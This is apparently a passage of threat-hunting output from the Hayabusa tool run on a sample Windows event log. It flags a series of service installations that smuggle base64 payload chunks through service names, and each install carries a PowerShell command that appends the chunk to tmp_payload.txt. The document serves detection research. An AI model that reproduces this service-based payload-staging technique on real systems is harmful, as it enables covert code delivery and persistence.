Tchopper.evtx" +2021-11-03 08:19:25.137 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: b3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZXINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAiQ2F1Z2h0IG9uIGxpbmUgbnVtYmVyOi | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg173"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:25.137 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: b3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZXINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAiQ2F1Z2h0IG9uIGxpbmUgbnVtYmVyOi | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg173"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:25.137 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: b3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZXINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAiQ2F1Z2h0IG9uIGxpbmUgbnVtYmVyOi | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg173"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:19:26.591 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: AkRXJyb3JMaW5lTnVtYmVyIg0KDQogICAgICAgIGV4aXQNCiAgICAgICAgDQogICAgIH0NCn0gICAgICAgICAgDQogICAgICAgIA0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg174"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:26.591 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AkRXJyb3JMaW5lTnVtYmVyIg0KDQogICAgICAgIGV4aXQNCiAgICAgICAgDQogICAgIH0NCn0gICAgICAgICAgDQogICAgICAgIA0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg174"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:26.591 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AkRXJyb3JMaW5lTnVtYmVyIg0KDQogICAgICAgIGV4aXQNCiAgICAgICAgDQogICAgIH0NCn0gICAgICAgICAgDQogICAgICAgIA0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg174"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:19:28.028 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojRnVuY3Rpb24gd2lsbCBnZW5lcmF0ZSBhIEZvbGRlciBTZWxlY3QgRGlhbG9nDQ | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg175"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:28.028 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojRnVuY3Rpb24gd2lsbCBnZW5lcmF0ZSBhIEZvbGRlciBTZWxlY3QgRGlhbG9nDQ | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg175"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:28.028 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojRnVuY3Rpb24gd2lsbCBnZW5lcmF0ZSBhIEZvbGRlciBTZWxlY3QgRGlhbG9nDQ | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg175"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:19:29.482 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: oNCiNAcGFyYW0gJERlc2NyaXB0aW9uIC0+ICBUaGUgRGVzY3JpcHRpb24gb2YgdGhlIERpYWxvZw0KI0BwYXJhbSAkUm9vdEZvbGRlciAgLT4gIFRoZSBsb2NhdGlvbiB0aGF0IHRoZSBmb2xkZXIg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg176"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:29.482 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: oNCiNAcGFyYW0gJERlc2NyaXB0aW9uIC0+ICBUaGUgRGVzY3JpcHRpb24gb2YgdGhlIERpYWxvZw0KI0BwYXJhbSAkUm9vdEZvbGRlciAgLT4gIFRoZSBsb2NhdGlvbiB0aGF0IHRoZSBmb2xkZXIg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg176"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:29.482 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: oNCiNAcGFyYW0gJERlc2NyaXB0aW9uIC0+ICBUaGUgRGVzY3JpcHRpb24gb2YgdGhlIERpYWxvZw0KI0BwYXJhbSAkUm9vdEZvbGRlciAgLT4gIFRoZSBsb2NhdGlvbiB0aGF0IHRoZSBmb2xkZXIg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg176"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:19:30.940 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: c2VsZWN0aW9uIGJlZ2lucw0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg177"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:30.940 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: c2VsZWN0aW9uIGJlZ2lucw0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg177"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:30.940 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: c2VsZWN0aW9uIGJlZ2lucw0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg177"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:19:32.394 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: MjIyMjDQoNCmZ1bmN0aW9uIFNlbGVjdC1FeHBvcnRMb2NhdGlvbiB7IHBhcmFtKCREZXNjcmlwdGlvbiwgJFJvb3RGb2xkZXIpIA0KDQogICAgIHRyeSB7DQogICAgIA0KICAgICAgICAkb2JqRm9y | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg178"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:32.394 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: MjIyMjDQoNCmZ1bmN0aW9uIFNlbGVjdC1FeHBvcnRMb2NhdGlvbiB7IHBhcmFtKCREZXNjcmlwdGlvbiwgJFJvb3RGb2xkZXIpIA0KDQogICAgIHRyeSB7DQogICAgIA0KICAgICAgICAkb2JqRm9y | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg178"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:32.394 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: MjIyMjDQoNCmZ1bmN0aW9uIFNlbGVjdC1FeHBvcnRMb2NhdGlvbiB7IHBhcmFtKCREZXNjcmlwdGlvbiwgJFJvb3RGb2xkZXIpIA0KDQogICAgIHRyeSB7DQogICAgIA0KICAgICAgICAkb2JqRm9y | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg178"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:19:33.831 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: bSA9IE5ldy1PYmplY3QgU3lzdGVtLldpbmRvd3MuRm9ybXMuRm9sZGVyQnJvd3NlckRpYWxvZw0KICAgICAgICAkb2JqRm9ybS5Sb290Zm9sZGVyID0gJFJvb3RGb2xkZXINCiAgICAgICAgJG9iak | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg179"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:33.831 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: bSA9IE5ldy1PYmplY3QgU3lzdGVtLldpbmRvd3MuRm9ybXMuRm9sZGVyQnJvd3NlckRpYWxvZw0KICAgICAgICAkb2JqRm9ybS5Sb290Zm9sZGVyID0gJFJvb3RGb2xkZXINCiAgICAgICAgJG9iak | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg179"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:33.831 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: bSA9IE5ldy1PYmplY3QgU3lzdGVtLldpbmRvd3MuRm9ybXMuRm9sZGVyQnJvd3NlckRpYWxvZw0KICAgICAgICAkb2JqRm9ybS5Sb290Zm9sZGVyID0gJFJvb3RGb2xkZXINCiAgICAgICAgJG9iak | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg179"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:19:35.440 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: Zvcm0uRGVzY3JpcHRpb24gPSAkRGVzY3JpcHRpb24gICAgICAgIA0KICAgICAgICAkU2hvdyA9ICRvYmpGb3JtLlNob3dEaWFsb2coKQ0KDQogICAgICAgIGlmICgkU2hvdyAtRVEgIk9LIikgew0K | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg180"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:35.440 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: Zvcm0uRGVzY3JpcHRpb24gPSAkRGVzY3JpcHRpb24gICAgICAgIA0KICAgICAgICAkU2hvdyA9ICRvYmpGb3JtLlNob3dEaWFsb2coKQ0KDQogICAgICAgIGlmICgkU2hvdyAtRVEgIk9LIikgew0K | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg180"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:35.440 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: Zvcm0uRGVzY3JpcHRpb24gPSAkRGVzY3JpcHRpb24gICAgICAgIA0KICAgICAgICAkU2hvdyA9ICRvYmpGb3JtLlNob3dEaWFsb2coKQ0KDQogICAgICAgIGlmICgkU2hvdyAtRVEgIk9LIikgew0K | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg180"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:19:36.895 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ICAgICAgICAgICAgDQogICAgICAgICAgICByZXR1cm4gJG9iakZvcm0uU2VsZWN0ZWRQYXRoDQogICAgICAgIH0NCiAgICAgICAgDQogICAgICAgIGVsc2UgeyAgICAgICAgICAgDQogICAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg181"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:36.895 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ICAgICAgICAgICAgDQogICAgICAgICAgICByZXR1cm4gJG9iakZvcm0uU2VsZWN0ZWRQYXRoDQogICAgICAgIH0NCiAgICAgICAgDQogICAgICAgIGVsc2UgeyAgICAgICAgICAgDQogICAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg181"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:36.895 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ICAgICAgICAgICAgDQogICAgICAgICAgICByZXR1cm4gJG9iakZvcm0uU2VsZWN0ZWRQYXRoDQogICAgICAgIH0NCiAgICAgICAgDQogICAgICAgIGVsc2UgeyAgICAgICAgICAgDQogICAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg181"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:19:38.333 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: AgICANCiAgICAgICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICJPcGVyYXRpb24gY2FuY2VsbGVkIGJ5IHVzZXIiDQoNCiAgICAgICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICRFcnJvclsw | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg182"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:38.333 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgICANCiAgICAgICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICJPcGVyYXRpb24gY2FuY2VsbGVkIGJ5IHVzZXIiDQoNCiAgICAgICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICRFcnJvclsw | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg182"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:38.333 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgICANCiAgICAgICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICJPcGVyYXRpb24gY2FuY2VsbGVkIGJ5IHVzZXIiDQoNCiAgICAgICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICRFcnJvclsw | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg182"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:19:39.787 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: XQ0KDQogICAgICAgICAgICAkRXJyb3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZXINCg0KICAgICAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg183"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:39.787 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: XQ0KDQogICAgICAgICAgICAkRXJyb3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZXINCg0KICAgICAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg183"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:39.787 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: XQ0KDQogICAgICAgICAgICAkRXJyb3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZXINCg0KICAgICAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg183"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:19:41.247 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: cgIkNhdWdodCBvbiBsaW5lIG51bWJlcjogJEVycm9yTGluZU51bWJlciINCg0KICAgICAgICAgICAgZXhpdA0KICAgICAgICAgICAgDQogICAgICAgIH0gDQoNCiAgICAgICAgDQogICAgIH0NCiAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg184"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:41.247 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: cgIkNhdWdodCBvbiBsaW5lIG51bWJlcjogJEVycm9yTGluZU51bWJlciINCg0KICAgICAgICAgICAgZXhpdA0KICAgICAgICAgICAgDQogICAgICAgIH0gDQoNCiAgICAgICAgDQogICAgIH0NCiAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg184"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:41.247 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: cgIkNhdWdodCBvbiBsaW5lIG51bWJlcjogJEVycm9yTGluZU51bWJlciINCg0KICAgICAgICAgICAgZXhpdA0KICAgICAgICAgICAgDQogICAgICAgIH0gDQoNCiAgICAgICAgDQogICAgIH0NCiAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg184"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:19:42.700 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ICAgDQogICAgIGNhdGNoIHsNCiAgICAgDQogICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICJVbmFibGUgdG8gU2VsZWN0IEZvbGRlciINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg185"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:19:42.700 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ICAgDQogICAgIGNhdGNoIHsNCiAgICAgDQogICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICJVbmFibGUgdG8gU2VsZWN0IEZvbGRlciINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg185"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand 